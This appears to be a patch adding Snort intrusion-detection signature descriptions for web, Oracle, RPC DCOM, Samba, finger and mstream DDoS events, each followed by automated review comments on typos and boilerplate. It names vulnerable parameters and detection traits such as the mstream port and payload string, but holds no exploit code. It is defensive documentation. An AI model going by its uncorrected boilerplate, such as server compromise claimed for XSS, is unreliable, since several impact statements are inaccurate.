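Review bot: same defects as 2862.txt above: the procedure name "add_update_resolution" is cut off from its sentence so the full stop starts the next line (". This procedure is included in"), Affected Systems reads "Oracle Oracle9i", and "None Known" lacks its period. Since this family of files shares everything except the procedure name, a single template with the name substituted would avoid repeating the same breakage in each one.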
--- /dev/null
+++ b/doc/signatures/100000526.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000526
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "PHPMyDirectory" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "from" parameter in the "index.php" script used 
+by the "PHPMyDirectory" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPMyDirectory
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
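Review bot: Impact and the second paragraph of Detailed Information are the generic CGI template ("system integrity compromise", "execute system binaries or malicious code") and do not describe a cross site scripting flaw; the Attack Scenarios section, which says a malicious link is used to steal information from the user who clicks it, is the accurate description. Rewrite Impact and that paragraph around script execution in the victim's browser and the information theft Attack Scenarios already names, rather than server compromise. Blank lines are missing before "--" in the Sid, Affected Systems and Contributors sections.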
--- /dev/null
+++ b/doc/signatures/110-2.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+110-2
+
+--
+Summary:
+This event is generated when the pre-processor spp_unidecode detects
+network traffic that may constitute an attack. Specifically a directory
+traversal was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_unidecode pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
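Review bot: Attack Scenarios is empty and Impact is "Unknown." although the Summary names a specific condition (a directory traversal detected by spp_unidecode); at minimum say that a traversal is an attempt to reach files outside the intended directory, which is what makes the event worth checking. Typo in Detailed Information: "consititute". Additional References is empty; a pointer to the spp_unidecode pre-processor documentation, in the way 122-10.txt points to README.sfportscan, would help.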
--- /dev/null
+++ b/doc/signatures/3190.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3190
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
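Review bot: fourth copy of the 3394.txt text in this patch (after 3424.txt and 3395.txt), with the same Attack Scenarios mismatch, the same "Expoit" typo and the same empty Additional References. Please fix the typo and the scenario once and propagate it to all four files, and state in each Summary which RPC request or port this particular sid matches.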
--- /dev/null
+++ b/doc/signatures/2880.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2880
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure comment_on_delete_resolution
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
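Review bot: as in 2862.txt and 2868.txt above, the procedure name "comment_on_delete_resolution" is separated from its full stop (". This procedure is included in" starts a new line), Affected Systems reads "Oracle Oracle9i", and "None Known" lacks a period; fix all three consistently across the sys.dbms_repcat_conf files.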
--- /dev/null
+++ b/doc/signatures/100000790.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000790
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Pivot" application running on a webserver. Access to the file "edit_new.php" using a remote file being passed as the "Paths[extensions_path]" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "Paths[extensions_path]" parameter in the "edit_new.php" script used by the "Pivot" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Pivot
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
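Review bot: the third paragraph of Detailed Information ("+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server...") is generic credential-validation boilerplate that does not describe a remote file include and carries the typo "ona"; drop it or reduce it to the input-validation sentence that precedes it, and fix "ona" to "on a" wherever the paragraph is kept. The Summary's "an exploitation attempt has been attempted" is redundant and should read "an exploitation attempt has been made".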
--- /dev/null
+++ b/doc/signatures/100000529.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+100000529
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "NC Linklist" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "cat" parameter in the "index.php" script used 
+by the "NC Linklist" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using NC Linklist
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
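Review bot: Impact and Detailed Information overstate what a reflected cross site scripting bug in the "cat" parameter gives an attacker. "+administrative access to the server or application. Possible execution of" and "+be possible for an attacker to retrieve sensitive data, execute system binaries" describe server-side code execution, while the Attack Scenarios section correctly describes a malicious link that runs in the victim's browser; align Impact with that (session or credential theft, content injection in the victim's browser) unless the rule also covers a separate server-side flaw, in which case name it.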
--- /dev/null
+++ b/doc/signatures/941.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+941
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
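Review bot: Detailed Information never says which FrontPage Server Extensions request sid 941 matches; "+vulnerabilities exist for this platform and the attack scenarios are" / "+legion." leaves the analyst unable to decide whether a hit is the vulnerable request or ordinary authoring traffic. Name the matched URI or method, and add a vendor bulletin under the empty Additional References section.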
--- /dev/null
+++ b/doc/signatures/1532.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1532
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
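Review bot: "+access to a CGI application running ona web server. Some applications do" has the typo "ona" for "on a". The description is also entirely generic for a rule with a specific sid; Detailed Information should state the script or request pattern sid 1532 matches so that the False Positives entry of "None known." can be assessed against legitimate use of that script.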
--- /dev/null
+++ b/doc/signatures/328.txt
@@ -0,0 +1,62 @@
+Rule:   
+
+--
+Sid: 328
+
+-- 
+
+Summary: 
+This event is generated when a Denial-of-Service (DoS) attack against a finger daemon is attempted.
+
+-- 
+
+Impact: 
+The attacker may overload the target machine or crash the finger daemon
+
+--
+Detailed Information:
+This event is generated when a specially crafted finger query is directed at a target UNIX host. 
+
+The Finger daemon is used to provide information about users on a UNIX system. It used to be installed and enabled by default on most UNIX/Linux systems. The attack will crash or overload the vulnerable machines.
+
+--
+
+Attack Scenarios: 
+The attacker needs to send specially crafted packets to the finger daemon on a host.
+
+-- 
+
+Ease of Attack: 
+Moderate, no exploit software is required, just a specially formatted finger query
+
+-- 
+
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+
+Corrective Action: 
+Disable the finger daemon or limit the addresses that can access the service via firewall or TCP wrappers.
+
+--
+Contributors: 
+Original rule written by Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0106
+
+Arachnids:
+http://www.whitehats.com/info/IDS381
+
+--
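Review bot: this file has no Affected Systems section between Detailed Information and Attack Scenarios, unlike every other signature file in the patch; add one listing UNIX hosts running a vulnerable finger daemon, as the Detailed Information text already implies. The reference "+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0106" uses the retired CAN- candidate prefix; the accepted identifier is CVE-1999-0106. The section separators in this file also carry trailing whitespace and extra blank lines ("+-- " followed by "+"), which breaks the consistent layout used elsewhere.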
--- /dev/null
+++ b/doc/signatures/100000652.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000652
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "MyPHP Guestbook" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "id" parameter in the "index.php" script used 
+by the "MyPHP Guestbook" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using MyPHP Guestbook
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
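Review bot: same impact mismatch as the other cross site scripting entries. "+administrative access to the server or application. Possible execution of" and "+be possible for an attacker to retrieve sensitive data, execute system binaries" claim server-side code execution for an XSS flaw in the "id" parameter of index.php, while Attack Scenarios describes a malicious link aimed at a user; restrict Impact to what XSS delivers (theft of the victim's session or credentials, injected content in the victim's browser).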
--- /dev/null
+++ b/doc/signatures/618.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+618
+
+--
+Summary:
+This event is generated when a scan is detected. 
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to scan a host.
+
+This may be the prelude to an attack. Scanners are used to ascertain which ports a host may be listening on, whether or not the ports are filtered by a firewall and if the host is vulnerable to a particular exploit.
+
+--
+Affected Systems:
+Any host.
+
+--
+Attack Scenarios:
+An attacker can determine if ports 21 and 20 are being used for FTP. Then the attacker might find out that the FTP service is vulnerable to a particular attack and is then able to compromise the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+A scanner may be used in a security audit.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Determine whether or not the scan was legitimate then look for other events concerning the attacking IP address.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
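Review bot: the Summary and Detailed Information ("+This event is generated when a scan is detected." / "+This event indicates that an attempt has been made to scan a host.") never identify which scanner signature or packet characteristic sid 618 matches, so an analyst cannot tell this rule apart from the sfPortscan preprocessor events or tune it; state the specific fingerprint the rule looks for. The False Positives entry already notes audit scans, so the Corrective Action text should point to confirming the source against the scheduled scanner list before escalating.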
--- /dev/null
+++ b/doc/signatures/1783.txt
@@ -0,0 +1,65 @@
+Rule:  
+
+--
+Sid:
+
+1783
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "oral sex".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "oral sex".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
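Review bot: the Summary "+This rule indicates that a webpage was visited the included the content "oral sex"." is ungrammatical; change "the included" to "that included". The Contributors line "+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>" is missing the space before the address that every other contributor line has, and the run of empty "+" lines before the final separator should be trimmed to one.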
--- /dev/null
+++ b/doc/signatures/100000372.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000372
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_styles.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_styles.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
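Review bot: "+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server." repeats the credential-validation boilerplate that does not describe a remote file include and carries the "ona" typo; remove the paragraph or fix "ona" to "on a" and keep only the input-validation sentence. The Summary's "an exploitation attempt has been attempted" should read "an exploitation attempt has been made".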
--- /dev/null
+++ b/doc/signatures/2194.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2194
+
+--
+Summary:
+This event is generated when an attempt is made to access CSMailto.cgi on an internal web server. This may indicate an attempt to exploit an input validation vulnerability in a form mail script distributed by CGIScript.NET.
+
+--
+Impact:
+Remote execution of arbitrary code and information disclosure.
+
+--
+Detailed Information:
+CSMailto.cgi is a Perl script that manages multiple email forms. An attacker can use a specially crafted URL to execute shell commands on the server and/or email files from the server to a remote email address.
+
+--
+Affected Systems:
+Any web server running CGIScript.NET CSMailto.cgi.
+
+--
+Attack Scenarios:
+An attacker places shell code in a URL sent to CSMailto.cgi on the web server. The server then executes the code.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+If a legitimate remote user accesses CSMailto.cgi, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+It is unknown if this vulnerability has been fixed. Contact the vendor, CGIScript.NET (http://www.cgiscript.net) for more information. 
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Sourcefire Technical Publications Team
+Jennifer Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+Bugtraq
+http://www.securityfocus.com/bid/4579
+
+--
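Review bot: Attack Scenarios says "+An attacker places shell code in a URL sent to CSMailto.cgi on the web server." but Detailed Information describes a Perl script that can be made to execute shell commands; "shell code" means a machine-code payload for a memory corruption exploit, which is not what an input validation flaw in a CGI script involves. Change it to "shell commands" to match the earlier paragraph. Corrective Action's "+It is unknown if this vulnerability has been fixed." should carry the date the statement was last checked so readers can judge whether it is still current.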
--- /dev/null
+++ b/doc/signatures/112-1.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+112-1
+
+--
+Summary:
+This event is generated when the pre-processor spp_arpspoof detects
+network traffic that may constitute an attack. Specifically a directed
+arp request was detected.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This event is generated when the spp_arpspoof pre-processor detects
+network traffic that may consititute an attack.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
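Review bot: Attack Scenarios is empty, and Impact "+Unknown." conflicts with Ease of Attack "+Simple." for the same event; a directed ARP request flagged by spp_arpspoof should at least describe the ARP cache poisoning or man-in-the-middle scenario the preprocessor exists to catch, and Impact should say so. "+network traffic that may consititute an attack." has the typo "consititute" for "constitute".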
--- /dev/null
+++ b/doc/signatures/534.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+534
+
+--
+Summary:
+This event is generated when an attempt is made to gain access to
+private resources using Samba.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to use Samba to gain
+access to private or administrative shares on a host.
+
+--
+Affected Systems:
+	All systems using Samba for file sharing.
+	All systems using file and print sharing for Windows.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+direct access to Windows adminsitrative shares.
+
+--
+Ease of Attack:
+Simple. Exploit software is not required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Original Rule Writer Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
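Review bot: "+direct access to Windows adminsitrative shares." has the typo "adminsitrative" for "administrative". The description is generic for a rule with a specific sid; Detailed Information should say which share or SMB request sid 534 matches so that hits can be distinguished from ordinary administrative use of the same shares, which the False Positives entry of "None known." currently ignores.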
--- /dev/null
+++ b/doc/signatures/3436.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3436
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
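Review bot: "+Simple. Expoit code exists." has the typo "Expoit" for "Exploit". For a vulnerability with this much public exploit history the empty Additional References section should cite the Microsoft security bulletin and CVE that this sid covers, so the reader can confirm the Corrective Action patch against the affected list "+	Windows NT 4.0" through "+	Windows Server 2003".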
--- /dev/null
+++ b/doc/signatures/248.txt
@@ -0,0 +1,57 @@
+Rule:
+--
+Sid:
+248
+
+--
+Summary:
+This event is generated when an mstream DDoS handler responds to an mstream client.
+
+--
+Impact:
+Severe.  If the list source IP is in your network, it may be an mstream handler.  If the listed destination IP is in your network, it may be an mstream client.
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. At the highest level, clients communicate with handlers to inform them to launch attacks.  A client may communicate with a handler using a TCP packet to destination port 12754 with a string of ">" in the payload.  A handler responds to this with a TCP source port of 12754 and a string of ">" in the payload.
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+An mstream handler may be respond to a communication from an mstream client.
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+There are other known client-to-handler ports in addition to 12754.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+--
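Review bot: two grammar slips in this file. Impact "+Severe.  If the list source IP is in your network, it may be an mstream handler." should read "listed source IP", and Attack Scenarios "+An mstream handler may be respond to a communication from an mstream client." should read "may respond". The False Negatives entry mentions other client-to-handler ports without naming them; listing them there would let the reader extend the rule.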
--- /dev/null
+++ b/doc/signatures/2607.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2607
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "comment_on_repobject" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "type" variable to cause
+the overflow. The result could permit the attacker to gain escalated
